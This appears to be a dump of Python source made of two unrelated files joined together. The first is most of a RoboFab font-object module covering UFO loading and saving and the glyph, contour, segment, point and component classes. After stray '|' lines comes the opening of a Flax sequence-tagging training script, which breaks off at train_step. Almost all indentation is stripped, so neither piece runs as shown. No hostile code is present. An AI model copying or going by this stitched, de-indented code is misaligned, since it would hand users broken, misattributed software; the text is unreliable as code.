classes = fontLib.get("org.robofab.opentype.classes")
if classes is not None:
del fontLib["org.robofab.opentype.classes"]
features.append(classes)
splitFeatures = fontLib.get("org.robofab.opentype.features")
if splitFeatures is not None:
order = fontLib.get("org.robofab.opentype.featureorder")
if order is None:
order = splitFeatures.keys()
order.sort()
else:
del fontLib["org.robofab.opentype.featureorder"]
del fontLib["org.robofab.opentype.features"]
for tag in order:
oneFeature = splitFeatures.get(tag)
if oneFeature is not None:
features.append(oneFeature)
features = "\n".join(features)
else:
features = reader.readFeatures()
self.features.text = features
# hint data
self.psHints = PostScriptFontHintValues(self)
if postScriptHintDataLibKey in fontLib:
del fontLib[postScriptHintDataLibKey]
# lib
self.lib.update(fontLib)
# glyphs
self._glyphSet = reader.getGlyphSet()
self._hasNotChanged(doGlyphs=False)
def _loadGlyph(self, glyphName):
"""Load a single glyph from the glyphSet, on request."""
from robofab.pens.rfUFOPen import RFUFOPointPen
g = RGlyph()
g.name = glyphName
pen = RFUFOPointPen(g)
self._glyphSet.readGlyph(glyphName=glyphName, glyphObject=g, pointPen=pen)
g.setParent(self)
g.psHints._loadFromLib(g.lib)
self._object[glyphName] = g
self._object[glyphName]._hasNotChanged()
return g
#def _prepareSaveDir(self, dir):
# path = os.path.join(dir, 'glyphs')
# if not os.path.exists(path):
# os.makedirs(path)
def _hasNotChanged(self, doGlyphs=True):
#set the changed state of the font
if doGlyphs:
for glyph in self:
glyph._hasNotChanged()
self.setChanged(False)
#
# attributes
#
def _get_path(self):
return self._path
path = property(_get_path, doc="path of the font")
#
# methods for imitating GlyphSet?
#
def keys(self):
		# the keys are the superset of self._object.keys() and
# self._glyphSet.keys(), minus self._scheduledForDeletion
keys = self._object.keys()
if self._glyphSet is not None:
keys.extend(self._glyphSet.keys())
d = dict()
for glyphName in keys:
d[glyphName] = None
for glyphName in self._scheduledForDeletion:
if glyphName in d:
del d[glyphName]
return d.keys()
def has_key(self, glyphName):
# XXX ditto, see above.
if self._glyphSet is not None:
hasGlyph = glyphName in self._object or glyphName in self._glyphSet
else:
hasGlyph = glyphName in self._object
return hasGlyph and not glyphName in self._scheduledForDeletion
__contains__ = has_key
def getWidth(self, glyphName):
if self._object.has_key(glyphName):
return self._object[glyphName].width
raise IndexError # or return None?
def getReverseComponentMapping(self):
"""
Get a reversed map of component references in the font.
{
'A' : ['Aacute', 'Aring']
'acute' : ['Aacute']
'ring' : ['Aring']
etc.
}
"""
		# a NON-REVERSED map is stored in the lib.
		# this is done because a reversed map could
# contain faulty data. for example: "Aacute" contains
# a component that references "A". Glyph "Aacute" is
# then deleted. The reverse map would still say that
# "A" is referenced by "Aacute" even though the
# glyph has been deleted. So, the stored lib works like this:
# {
# 'Aacute' : [
# # the last known mod time of the GLIF
# 1098706856.75,
# # component references in a glyph
# ['A', 'acute']
# ]
# }
import time
import os
import re
componentSearch_RE = re.compile(
"<component\s+" # <component
"[^>]*?" # anything EXCEPT >
"base\s*=\s*[\"\']" # base="
"(.*?)" # foo
"[\"\']" # "
)
rightNow = time.time()
libKey = "org.robofab.componentMapping"
previousMap = None
if self.lib.has_key(libKey):
previousMap = self.lib[libKey]
basicMap = {}
reverseMap = {}
for glyphName in self.keys():
componentsToMap = None
modTime = None
# get the previous bits of data
previousModTime = None
previousList = None
if previousMap is not None and previousMap.has_key(glyphName):
previousModTime, previousList = previousMap[glyphName]
# the glyph has been loaded.
# simply get the components from it.
if self._object.has_key(glyphName):
componentsToMap = [component.baseGlyph for component in self._object[glyphName].components]
# the glyph has not been loaded.
else:
glyphPath = os.path.join(self._glyphSet.dirName, self._glyphSet.contents[glyphName])
scanGlyph = True
# test the modified time of the GLIF
fileModTime = os.path.getmtime(glyphPath)
if previousModTime is not None and fileModTime == previousModTime:
					# the GLIF almost* certainly has not changed.
# *theoretically, a user could replace a GLIF
# with another GLIF that has precisely the same
# mod time.
scanGlyph = False
componentsToMap = previousList
modTime = previousModTime
else:
# the GLIF is different
modTime = fileModTime
if scanGlyph:
# use regex to extract component
# base glyphs from the file
f = open(glyphPath, 'rb')
data = f.read()
f.close()
componentsToMap = componentSearch_RE.findall(data)
if componentsToMap is not None:
# store the non-reversed map
basicMap[glyphName] = (modTime, componentsToMap)
# reverse the map for the user
if componentsToMap:
for baseGlyphName in componentsToMap:
if not reverseMap.has_key(baseGlyphName):
reverseMap[baseGlyphName] = []
reverseMap[baseGlyphName].append(glyphName)
# if a glyph has been loaded, we do not store data about it in the lib.
				# this is done because there is no way to determine the proper mod time
# for a loaded glyph.
if modTime is None:
del basicMap[glyphName]
# store the map in the lib for re-use
self.lib[libKey] = basicMap
return reverseMap
def save(self, destDir=None, doProgress=False, formatVersion=2):
"""Save the Font in UFO format."""
# XXX note that when doing "save as" by specifying the destDir argument
# _all_ glyphs get loaded into memory. This could be optimized by either
# copying those .glif files that have not been edited or (not sure how
# well that would work) by simply clearing out self._objects after the
# save.
from robofab.ufoLib import UFOWriter
from robofab.tools.fontlabFeatureSplitter import splitFeaturesForFontLab
# if no destination is given, or if
# the given destination is the current
# path, this is not a save as operation
if destDir is None or destDir == self._path:
saveAs = False
destDir = self._path
else:
saveAs = True
# start a progress bar
nonGlyphCount = 5
bar = None
if doProgress:
from robofab.interface.all.dialogs import ProgressBar
bar = ProgressBar("Exporting UFO", nonGlyphCount + len(self._object.keys()))
# write
writer = UFOWriter(destDir, formatVersion=formatVersion)
try:
# make a shallow copy of the lib. stuff may be added to it.
fontLib = dict(self.lib)
# info
if bar:
bar.label("Saving info...")
writer.writeInfo(self.info)
if bar:
bar.tick()
# kerning
if self.kerning.changed or saveAs:
if bar:
bar.label("Saving kerning...")
writer.writeKerning(self.kerning.asDict())
if bar:
bar.tick()
# groups
if bar:
bar.label("Saving groups...")
writer.writeGroups(self.groups)
if bar:
bar.tick()
# features
if bar:
bar.label("Saving features...")
features = self.features.text
if features is None:
features = ""
if formatVersion == 2:
writer.writeFeatures(features)
elif formatVersion == 1:
classes, features = splitFeaturesForFontLab(features)
if classes:
fontLib["org.robofab.opentype.classes"] = classes.strip() + "\n"
if features:
featureDict = {}
for featureName, featureText in features:
featureDict[featureName] = featureText.strip() + "\n"
fontLib["org.robofab.opentype.features"] = featureDict
fontLib["org.robofab.opentype.featureorder"] = [featureName for featureName, featureText in features]
if bar:
bar.tick()
# lib
if formatVersion == 1:
fontLib[postScriptHintDataLibKey] = self.psHints.asDict()
if bar:
bar.label("Saving lib...")
writer.writeLib(fontLib)
if bar:
bar.tick()
# glyphs
glyphNameToFileNameFunc = self.getGlyphNameToFileNameFunc()
glyphSet = writer.getGlyphSet(glyphNameToFileNameFunc)
if len(self._scheduledForDeletion) != 0:
if bar:
bar.label("Removing deleted glyphs...")
for glyphName in self._scheduledForDeletion:
if glyphSet.has_key(glyphName):
glyphSet.deleteGlyph(glyphName)
if bar:
bar.tick()
if bar:
bar.label("Saving glyphs...")
count = nonGlyphCount
if saveAs:
glyphNames = self.keys()
else:
glyphNames = self._object.keys()
for glyphName in glyphNames:
glyph = self[glyphName]
glyph.psHints._saveToLib(glyph.lib)
glyph._saveToGlyphSet(glyphSet, glyphName=glyphName, force=saveAs)
if bar and not count % 10:
bar.tick(count)
count = count + 1
glyphSet.writeContents()
self._glyphSet = glyphSet
# only blindly stop if the user says to
except KeyboardInterrupt:
bar.close()
bar = None
# kill the progress bar
if bar:
bar.close()
# reset internal stuff
self._path = destDir
self._scheduledForDeletion = []
self.setChanged(False)
def newGlyph(self, glyphName, clear=True):
"""Make a new glyph with glyphName
if the glyph exists and clear=True clear the glyph"""
if clear and glyphName in self:
g = self[glyphName]
g.clear()
w = self.info.postscriptDefaultWidthX
if w is None:
w = 0
g.width = w
return g
g = RGlyph()
g.setParent(self)
g.name = glyphName
w = self.info.postscriptDefaultWidthX
if w is None:
w = 0
g.width = w
g._hasChanged()
self._object[glyphName] = g
# is the user adding a glyph that has the same
# name as one that was deleted earlier?
if glyphName in self._scheduledForDeletion:
self._scheduledForDeletion.remove(glyphName)
return self.getGlyph(glyphName)
def insertGlyph(self, glyph, name=None):
"""returns a new glyph that has been inserted into the font"""
if name is None:
name = glyph.name
glyph = glyph.copy()
glyph.name = name
glyph.setParent(self)
glyph._hasChanged()
self._object[name] = glyph
# is the user adding a glyph that has the same
# name as one that was deleted earlier?
if name in self._scheduledForDeletion:
self._scheduledForDeletion.remove(name)
return self.getGlyph(name)
def removeGlyph(self, glyphName):
"""remove a glyph from the font"""
# XXX! Potential issue with removing glyphs.
# if a glyph is removed from a font, but it is still referenced
# by a component, it will give pens some trouble.
		# where does the responsibility for catching this fall?
# the removeGlyph method? the addComponent method
# of the various pens? somewhere else? hm... tricky.
#
#we won't actually remove it, we will just store it for removal
# but only if the glyph does exist
if self.has_key(glyphName) and glyphName not in self._scheduledForDeletion:
self._scheduledForDeletion.append(glyphName)
# now delete the object
if self._object.has_key(glyphName):
del self._object[glyphName]
self._hasChanged()
def getGlyph(self, glyphName):
# XXX getGlyph may have to become private, to avoid duplication
# with __getitem__
n = None
if self._object.has_key(glyphName):
# have we served this glyph before? it should be in _object
n = self._object[glyphName]
else:
# haven't served it before, is it in the glyphSet then?
if self._glyphSet is not None and glyphName in self._glyphSet:
# yes, read the .glif file from disk
n = self._loadGlyph(glyphName)
if n is None:
raise KeyError, glyphName
return n
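# A brief usage sketch for RFont (illustrative only; the UFO path below is
# hypothetical and the glyph names depend on the font):
#
#   font = RFont("/path/to/Demo.ufo")   # glyphs are read lazily from the UFO
#   print len(font), "A" in font
#   glyph = font["A"]                    # loads A's .glif on first access
#   font.newGlyph("A.alt")               # exists in memory until save()
#   font.removeGlyph("B")                # scheduled for deletion at save time
#   font.save()                          # writes only changed glyphs back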
class RGlyph(BaseGlyph):
_title = "RGlyph"
def __init__(self):
BaseGlyph.__init__(self)
self.contours = []
self.components = []
self.anchors = []
self._unicodes = []
self.width = 0
self.note = None
self._name = "Unnamed Glyph"
self.selected = False
self._properties = None
self._lib = RLib()
self._lib.setParent(self)
self.psHints = PostScriptGlyphHintValues()
self.psHints.setParent(self)
def __len__(self):
return len(self.contours)
def __getitem__(self, index):
if index < len(self.contours):
return self.contours[index]
raise IndexError
def _hasNotChanged(self):
for contour in self.contours:
contour.setChanged(False)
for segment in contour.segments:
segment.setChanged(False)
for point in segment.points:
point.setChanged(False)
for component in self.components:
component.setChanged(False)
for anchor in self.anchors:
anchor.setChanged(False)
self.setChanged(False)
#
# attributes
#
def _get_lib(self):
return self._lib
def _set_lib(self, obj):
self._lib.clear()
self._lib.update(obj)
lib = property(_get_lib, _set_lib)
def _get_name(self):
return self._name
def _set_name(self, value):
prevName = self._name
newName = value
if newName == prevName:
return
self._name = newName
self.setChanged(True)
font = self.getParent()
if font is not None:
# but, this glyph could be linked to a
# FontLab font, because objectsFL.RGlyph.copy()
# creates an objectsRF.RGlyph with the parent
# set to an objectsFL.RFont object. so, check to see
# if this is a legitimate RFont before trying to
# do the objectsRF.RFont glyph name change
if isinstance(font, RFont):
font._object[newName] = self
# is the user changing a glyph's name to the
# name of a glyph that was deleted earlier?
if newName in font._scheduledForDeletion:
font._scheduledForDeletion.remove(newName)
font.removeGlyph(prevName)
name = property(_get_name, _set_name)
def _get_unicodes(self):
return self._unicodes
def _set_unicodes(self, value):
if not isinstance(value, list):
raise RoboFabError, "unicodes must be a list"
self._unicodes = value
self._hasChanged()
unicodes = property(_get_unicodes, _set_unicodes, doc="all unicode values for the glyph")
def _get_unicode(self):
if len(self._unicodes) == 0:
return None
return self._unicodes[0]
def _set_unicode(self, value):
uni = self._unicodes
if value is not None:
if value not in uni:
self.unicodes.insert(0, value)
elif uni.index(value) != 0:
uni.insert(0, uni.pop(uni.index(value)))
self.unicodes = uni
unicode = property(_get_unicode, _set_unicode, doc="first unicode value for the glyph")
def getPointPen(self):
from robofab.pens.rfUFOPen import RFUFOPointPen
return RFUFOPointPen(self)
def appendComponent(self, baseGlyph, offset=(0, 0), scale=(1, 1)):
"""append a component to the glyph"""
new = RComponent(baseGlyph, offset, scale)
new.setParent(self)
self.components.append(new)
self._hasChanged()
def appendAnchor(self, name, position, mark=None):
"""append an anchor to the glyph"""
new = RAnchor(name, position, mark)
new.setParent(self)
self.anchors.append(new)
self._hasChanged()
def removeContour(self, index):
"""remove a specific contour from the glyph"""
del self.contours[index]
self._hasChanged()
def removeAnchor(self, anchor):
"""remove a specific anchor from the glyph"""
del self.anchors[anchor.index]
self._hasChanged()
def removeComponent(self, component):
"""remove a specific component from the glyph"""
del self.components[component.index]
self._hasChanged()
def center(self, padding=None):
"""Equalise sidebearings, set to padding if wanted."""
left = self.leftMargin
right = self.rightMargin
if padding:
e_left = e_right = padding
else:
e_left = (left + right)/2
e_right = (left + right) - e_left
self.leftMargin = e_left
self.rightMargin = e_right
def decompose(self):
"""Decompose all components"""
for i in range(len(self.components)):
self.components[-1].decompose()
self._hasChanged()
def clear(self, contours=True, components=True, anchors=True, guides=True):
"""Clear all items marked as True from the glyph"""
if contours:
self.clearContours()
if components:
self.clearComponents()
if anchors:
self.clearAnchors()
if guides:
self.clearHGuides()
self.clearVGuides()
def clearContours(self):
"""clear all contours"""
self.contours = []
self._hasChanged()
def clearComponents(self):
"""clear all components"""
self.components = []
self._hasChanged()
def clearAnchors(self):
"""clear all anchors"""
self.anchors = []
self._hasChanged()
def clearHGuides(self):
"""clear all horizontal guides"""
self.hGuides = []
self._hasChanged()
def clearVGuides(self):
"""clear all vertical guides"""
self.vGuides = []
self._hasChanged()
def getAnchors(self):
return self.anchors
def getComponents(self):
return self.components
#
# stuff related to Glyph Properties
#
class RContour(BaseContour):
_title = "RoboFabContour"
def __init__(self, object=None):
#BaseContour.__init__(self)
self.segments = []
self.selected = False
def __len__(self):
return len(self.segments)
def __getitem__(self, index):
if index < len(self.segments):
return self.segments[index]
raise IndexError
def _get_index(self):
return self.getParent().contours.index(self)
def _set_index(self, index):
ogIndex = self.index
if index != ogIndex:
contourList = self.getParent().contours
contourList.insert(index, contourList.pop(ogIndex))
index = property(_get_index, _set_index, doc="index of the contour")
def _get_points(self):
points = []
for segment in self.segments:
for point in segment.points:
points.append(point)
return points
points = property(_get_points, doc="view the contour as a list of points")
def _get_bPoints(self):
bPoints = []
for segment in self.segments:
segType = segment.type
if segType == MOVE:
bType = CORNER
elif segType == LINE:
bType = CORNER
elif segType == CURVE:
if segment.smooth:
bType = CURVE
else:
bType = CORNER
else:
raise RoboFabError, "encountered unknown segment type"
b = RBPoint()
b.setParent(segment)
bPoints.append(b)
return bPoints
bPoints = property(_get_bPoints, doc="view the contour as a list of bPoints")
def appendSegment(self, segmentType, points, smooth=False):
"""append a segment to the contour"""
segment = self.insertSegment(index=len(self.segments), segmentType=segmentType, points=points, smooth=smooth)
return segment
def insertSegment(self, index, segmentType, points, smooth=False):
"""insert a segment into the contour"""
segment = RSegment(segmentType, points, smooth)
segment.setParent(self)
self.segments.insert(index, segment)
self._hasChanged()
return segment
def removeSegment(self, index):
"""remove a segment from the contour"""
del self.segments[index]
self._hasChanged()
def reverseContour(self):
"""reverse the contour"""
from robofab.pens.reverseContourPointPen import ReverseContourPointPen
index = self.index
glyph = self.getParent()
pen = glyph.getPointPen()
reversePen = ReverseContourPointPen(pen)
self.drawPoints(reversePen)
# we've drawn the reversed contour onto our parent glyph,
# so it sits at the end of the contours list:
newContour = glyph.contours.pop(-1)
for segment in newContour.segments:
segment.setParent(self)
self.segments = newContour.segments
self._hasChanged()
def setStartSegment(self, segmentIndex):
"""set the first segment on the contour"""
# this obviously does not support open contours
if len(self.segments) < 2:
return
if segmentIndex == 0:
return
if segmentIndex > len(self.segments)-1:
raise IndexError, 'segment index not in segments list'
oldStart = self.segments[0]
oldLast = self.segments[-1]
#check to see if the contour ended with a curve on top of the move
#if we find one delete it,
if oldLast.type == CURVE or oldLast.type == QCURVE:
startOn = oldStart.onCurve
lastOn = oldLast.onCurve
if startOn.x == lastOn.x and startOn.y == lastOn.y:
del self.segments[0]
				# since we deleted the first segment, the segmentIndex needs to shift
segmentIndex = segmentIndex - 1
# if we DO have a move left over, we need to convert it to a line
if self.segments[0].type == MOVE:
self.segments[0].type = LINE
# slice up the segments and reassign them to the contour
segments = self.segments[segmentIndex:]
self.segments = segments + self.segments[:segmentIndex]
# now, draw the contour onto the parent glyph
glyph = self.getParent()
pen = glyph.getPointPen()
self.drawPoints(pen)
# we've drawn the new contour onto our parent glyph,
# so it sits at the end of the contours list:
newContour = glyph.contours.pop(-1)
for segment in newContour.segments:
segment.setParent(self)
self.segments = newContour.segments
self._hasChanged()
class RSegment(BaseSegment):
_title = "RoboFabSegment"
def __init__(self, segmentType=None, points=[], smooth=False):
BaseSegment.__init__(self)
self.selected = False
self.points = []
self.smooth = smooth
if points:
#the points in the segment should be RPoints, so create those objects
for point in points[:-1]:
x, y = point
p = RPoint(x, y, pointType=OFFCURVE)
p.setParent(self)
self.points.append(p)
aX, aY = points[-1]
p = RPoint(aX, aY, segmentType)
p.setParent(self)
self.points.append(p)
def _get_type(self):
return self.points[-1].type
def _set_type(self, pointType):
onCurve = self.points[-1]
ocType = onCurve.type
if ocType == pointType:
return
#we are converting a cubic line into a cubic curve
if pointType == CURVE and ocType == LINE:
onCurve.type = pointType
parent = self.getParent()
prev = parent._prevSegment(self.index)
p1 = RPoint(prev.onCurve.x, prev.onCurve.y, pointType=OFFCURVE)
p1.setParent(self)
p2 = RPoint(onCurve.x, onCurve.y, pointType=OFFCURVE)
p2.setParent(self)
self.points.insert(0, p2)
self.points.insert(0, p1)
#we are converting a cubic move to a curve
elif pointType == CURVE and ocType == MOVE:
onCurve.type = pointType
parent = self.getParent()
prev = parent._prevSegment(self.index)
p1 = RPoint(prev.onCurve.x, prev.onCurve.y, pointType=OFFCURVE)
p1.setParent(self)
p2 = RPoint(onCurve.x, onCurve.y, pointType=OFFCURVE)
p2.setParent(self)
self.points.insert(0, p2)
self.points.insert(0, p1)
#we are converting a quad curve to a cubic curve
elif pointType == CURVE and ocType == QCURVE:
			onCurve.type = pointType
#we are converting a cubic curve into a cubic line
elif pointType == LINE and ocType == CURVE:
p = self.points.pop(-1)
self.points = [p]
onCurve.type = pointType
self.smooth = False
#we are converting a cubic move to a line
elif pointType == LINE and ocType == MOVE:
onCurve.type = pointType
#we are converting a quad curve to a line:
elif pointType == LINE and ocType == QCURVE:
p = self.points.pop(-1)
self.points = [p]
onCurve.type = pointType
self.smooth = False
# we are converting to a quad curve where just about anything is legal
elif pointType == QCURVE:
onCurve.type = pointType
else:
raise RoboFabError, 'unknown segment type'
type = property(_get_type, _set_type, doc="type of the segment")
def _get_index(self):
return self.getParent().segments.index(self)
index = property(_get_index, doc="index of the segment")
def insertPoint(self, index, pointType, point):
x, y = point
p = RPoint(x, y, pointType=pointType)
p.setParent(self)
self.points.insert(index, p)
self._hasChanged()
def removePoint(self, index):
del self.points[index]
self._hasChanged()
class RBPoint(BaseBPoint):
_title = "RoboFabBPoint"
def _setAnchorChanged(self, value):
self._anchorPoint.setChanged(value)
def _setNextChanged(self, value):
self._nextOnCurve.setChanged(value)
def _get__parentSegment(self):
return self.getParent()
_parentSegment = property(_get__parentSegment, doc="")
def _get__nextOnCurve(self):
pSeg = self._parentSegment
contour = pSeg.getParent()
#could this potentially return an incorrect index? say, if two segments are exactly the same?
return contour.segments[(contour.segments.index(pSeg) + 1) % len(contour.segments)]
_nextOnCurve = property(_get__nextOnCurve, doc="")
def _get_index(self):
return self._parentSegment.index
index = property(_get_index, doc="index of the bPoint on the contour")
class RPoint(BasePoint):
_title = "RoboFabPoint"
def __init__(self, x=0, y=0, pointType=None, name=None):
self.selected = False
self._type = pointType
self._x = x
self._y = y
self._name = name
def _get_x(self):
return self._x
def _set_x(self, value):
self._x = value
self._hasChanged()
x = property(_get_x, _set_x, doc="")
def _get_y(self):
return self._y
def _set_y(self, value):
self._y = value
self._hasChanged()
y = property(_get_y, _set_y, doc="")
def _get_type(self):
return self._type
def _set_type(self, value):
self._type = value
self._hasChanged()
type = property(_get_type, _set_type, doc="")
def _get_name(self):
return self._name
def _set_name(self, value):
self._name = value
self._hasChanged()
name = property(_get_name, _set_name, doc="")
class RAnchor(BaseAnchor):
_title = "RoboFabAnchor"
def __init__(self, name=None, position=None, mark=None):
BaseAnchor.__init__(self)
self.selected = False
self.name = name
if position is None:
self.x = self.y = None
else:
self.x, self.y = position
self.mark = mark
def _get_index(self):
if self.getParent() is None: return None
return self.getParent().anchors.index(self)
index = property(_get_index, doc="index of the anchor")
def _get_position(self):
return (self.x, self.y)
def _set_position(self, value):
self.x = value[0]
self.y = value[1]
self._hasChanged()
position = property(_get_position, _set_position, doc="position of the anchor")
def move(self, (x, y)):
"""Move the anchor"""
self.x = self.x + x
self.y = self.y + y
self._hasChanged()
class RComponent(BaseComponent):
_title = "RoboFabComponent"
def __init__(self, baseGlyphName=None, offset=(0,0), scale=(1,1), transform=None):
BaseComponent.__init__(self)
self.selected = False
self._baseGlyph = baseGlyphName
self._offset = offset
self._scale = scale
if transform is None:
xx, yy = scale
dx, dy = offset
self.transformation = (xx, 0, 0, yy, dx, dy)
else:
self.transformation = transform
def _get_index(self):
if self.getParent() is None: return None
return self.getParent().components.index(self)
index = property(_get_index, doc="index of the component")
def _get_baseGlyph(self):
return self._baseGlyph
def _set_baseGlyph(self, glyphName):
		# XXXX needs to be implemented in objectsFL for symmetry's sake. Eventually.
self._baseGlyph = glyphName
self._hasChanged()
baseGlyph = property(_get_baseGlyph, _set_baseGlyph, doc="")
def _get_offset(self):
""" Get the offset component of the transformation.="""
(xx, xy, yx, yy, dx, dy) = self._transformation
return dx, dy
def _set_offset(self, value):
""" Set the offset component of the transformation."""
(xx, xy, yx, yy, dx, dy) = self._transformation
self._transformation = (xx, xy, yx, yy, value[0], value[1])
self._hasChanged()
offset = property(_get_offset, _set_offset, doc="the offset of the component")
def _get_scale(self):
""" Return the scale components of the transformation."""
(xx, xy, yx, yy, dx, dy) = self._transformation
return xx, yy
def _set_scale(self, (xScale, yScale)):
""" Set the scale component of the transformation.
Note: setting this value effectively makes the xy and yx values meaningless.
We're assuming that if you're setting the xy and yx values, you will use
the transformation attribute rather than the scale and offset attributes.
"""
(xx, xy, yx, yy, dx, dy) = self._transformation
self._transformation = (xScale, xy, yx, yScale, dx, dy)
self._hasChanged()
scale = property(_get_scale, _set_scale, doc="the scale of the component")
def _get_transformation(self):
return self._transformation
def _set_transformation(self, transformation):
assert len(transformation)==6, "Transformation matrix must have 6 values"
self._transformation = transformation
transformation = property(_get_transformation, _set_transformation, doc="the transformation matrix of the component")
def move(self, (x, y)):
"""Move the component"""
(xx, xy, yx, yy, dx, dy) = self._transformation
self._transformation = (xx, xy, yx, yy, dx+x, dy+y)
self._hasChanged()
def decompose(self):
"""Decompose the component"""
baseGlyphName = self.baseGlyph
parentGlyph = self.getParent()
# if there is no parent glyph, there is nothing to decompose to
if baseGlyphName is not None and parentGlyph is not None:
parentFont = parentGlyph.getParent()
# we must have a parent glyph with the baseGlyph
# if not, we will simply remove the component from
# the parent glyph thereby decomposing the component
# to nothing.
if parentFont is not None and parentFont.has_key(baseGlyphName):
from robofab.pens.adapterPens import TransformPointPen
baseGlyph = parentFont[baseGlyphName]
for contour in baseGlyph.contours:
pointPen = parentGlyph.getPointPen()
transPen = TransformPointPen(pointPen, self._transformation)
contour.drawPoints(transPen)
parentGlyph.components.remove(self)
class RKerning(BaseKerning):
_title = "RoboFabKerning"
class RGroups(BaseGroups):
_title = "RoboFabGroups"
class RLib(BaseLib):
_title = "RoboFabLib"
class RInfo(BaseInfo):
_title = "RoboFabFontInfo"
class RFeatures(BaseFeatures):
_title = "RoboFabFeatures"
|
|
# Copyright 2022 The Flax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Sequence Tagging example.
This script trains a Transformer on the Universal Dependencies dataset.
"""
import functools
import os
import time
from absl import app
from absl import flags
from absl import logging
from flax import jax_utils
from flax import linen as nn
from flax.metrics import tensorboard
from flax import optim
from flax.training import common_utils
import jax
import jax.numpy as jnp
from jax import random
import numpy as np
import tensorflow as tf
import input_pipeline
import models
FLAGS = flags.FLAGS
flags.DEFINE_string('model_dir', default='', help=('Directory for model data.'))
flags.DEFINE_string('experiment', default='xpos', help=('Experiment name.'))
flags.DEFINE_integer(
'batch_size', default=64, help=('Batch size for training.'))
flags.DEFINE_integer(
'eval_frequency',
default=100,
help=('Frequency of eval during training, e.g. every 1000 steps.'))
flags.DEFINE_integer(
'num_train_steps', default=75000, help=('Number of train steps.'))
flags.DEFINE_float('learning_rate', default=0.05, help=('Learning rate.'))
flags.DEFINE_float(
'weight_decay',
default=1e-1,
help=('Decay factor for AdamW style weight decay.'))
flags.DEFINE_integer('max_length', default=256,
help=('Maximum length of examples.'))
flags.DEFINE_integer(
'random_seed', default=0, help=('Integer for PRNG random seed.'))
flags.DEFINE_string('train', default='', help=('Path to training data.'))
flags.DEFINE_string('dev', default='', help=('Path to development data.'))
def create_learning_rate_scheduler(
factors='constant * linear_warmup * rsqrt_decay',
base_learning_rate=0.5,
warmup_steps=8000,
decay_factor=0.5,
steps_per_decay=20000,
steps_per_cycle=100000):
"""creates learning rate schedule.
Interprets factors in the factors string which can consist of:
* constant: interpreted as the constant value,
* linear_warmup: interpreted as linear warmup until warmup_steps,
* rsqrt_decay: divide by square root of max(step, warmup_steps)
* decay_every: Every k steps decay the learning rate by decay_factor.
* cosine_decay: Cyclic cosine decay, uses steps_per_cycle parameter.
Args:
factors: a string with factors separated by '*' that defines the schedule.
base_learning_rate: float, the starting constant for the lr schedule.
warmup_steps: how many steps to warm up for in the warmup schedule.
decay_factor: The amount to decay the learning rate by.
steps_per_decay: How often to decay the learning rate.
steps_per_cycle: Steps per cycle when using cosine decay.
Returns:
a function learning_rate(step): float -> {'learning_rate': float}, the
step-dependent lr.
"""
factors = [n.strip() for n in factors.split('*')]
def step_fn(step):
"""Step to learning rate function."""
ret = 1.0
for name in factors:
if name == 'constant':
ret *= base_learning_rate
elif name == 'linear_warmup':
ret *= jnp.minimum(1.0, step / warmup_steps)
elif name == 'rsqrt_decay':
ret /= jnp.sqrt(jnp.maximum(step, warmup_steps))
elif name == 'rsqrt_normalized_decay':
ret *= jnp.sqrt(warmup_steps)
ret /= jnp.sqrt(jnp.maximum(step, warmup_steps))
elif name == 'decay_every':
ret *= (decay_factor**(step // steps_per_decay))
elif name == 'cosine_decay':
progress = jnp.maximum(0.0,
(step - warmup_steps) / float(steps_per_cycle))
ret *= jnp.maximum(0.0,
0.5 * (1.0 + jnp.cos(jnp.pi * (progress % 1.0))))
else:
raise ValueError('Unknown factor %s.' % name)
return jnp.asarray(ret, dtype=jnp.float32)
return step_fn
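# Worked example (illustrative): with the default factors
# 'constant * linear_warmup * rsqrt_decay', base_learning_rate=0.05 and
# warmup_steps=8000 the schedule is
#   lr(step) = 0.05 * min(1, step / 8000) / sqrt(max(step, 8000))
# i.e. a linear ramp that peaks at 0.05 / sqrt(8000) ~= 5.6e-4 at step 8000,
# followed by inverse-square-root decay:
#
#   lr_fn = create_learning_rate_scheduler(base_learning_rate=0.05)
#   lr_fn(8000)    # -> ~5.6e-4
#   lr_fn(32000)   # -> ~2.8e-4 (halves again each time the step count quadruples)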
def compute_weighted_cross_entropy(logits, targets, weights=None):
"""Compute weighted cross entropy and entropy for log probs and targets.
Args:
logits: [batch, length, num_classes] float array.
targets: categorical targets [batch, length] int array.
weights: None or array of shape [batch x length]
Returns:
Tuple of scalar loss and batch normalizing factor.
"""
if logits.ndim != targets.ndim + 1:
raise ValueError('Incorrect shapes. Got shape %s logits and %s targets' %
(str(logits.shape), str(targets.shape)))
onehot_targets = common_utils.onehot(targets, logits.shape[-1])
loss = -jnp.sum(onehot_targets * nn.log_softmax(logits), axis=-1)
normalizing_factor = onehot_targets.sum()
if weights is not None:
loss = loss * weights
normalizing_factor = weights.sum()
return loss.sum(), normalizing_factor
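# Shape sketch (illustrative): for 2 sequences of length 3 over 5 classes,
# logits is [2, 3, 5] while targets and weights are [2, 3]. Padding positions
# get weight 0, so they contribute neither to the summed loss nor to the
# normalizing factor:
#
#   weights = jnp.where(targets > 0, 1, 0).astype(jnp.float32)
#   loss_sum, norm = compute_weighted_cross_entropy(logits, targets, weights)
#   mean_loss = loss_sum / norm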
def compute_weighted_accuracy(logits, targets, weights=None):
"""Compute weighted accuracy for log probs and targets.
Args:
logits: [batch, length, num_classes] float array.
targets: categorical targets [batch, length] int array.
weights: None or array of shape [batch x length]
Returns:
Tuple of scalar accuracy and batch normalizing factor.
"""
if logits.ndim != targets.ndim + 1:
raise ValueError('Incorrect shapes. Got shape %s logits and %s targets' %
(str(logits.shape), str(targets.shape)))
loss = jnp.equal(jnp.argmax(logits, axis=-1), targets)
normalizing_factor = np.prod(logits.shape[:-1])
if weights is not None:
loss = loss * weights
normalizing_factor = weights.sum()
return loss.sum(), normalizing_factor
def compute_metrics(logits, labels, weights):
"""Compute summary metrics."""
loss, weight_sum = compute_weighted_cross_entropy(logits, labels, weights)
acc, _ = compute_weighted_accuracy(logits, labels, weights)
metrics = {
'loss': loss,
'accuracy': acc,
'denominator': weight_sum,
}
  # sum the per-device metric sums across the 'batch' axis; compute_metrics
  # is only called from inside pmap'd train/eval steps.
  metrics = jax.lax.psum(metrics, axis_name='batch')
return metrics
def train_step(optimizer, batch, learning_rate_fn, model, dropout_rng=None):
"""Perform a single training step."""
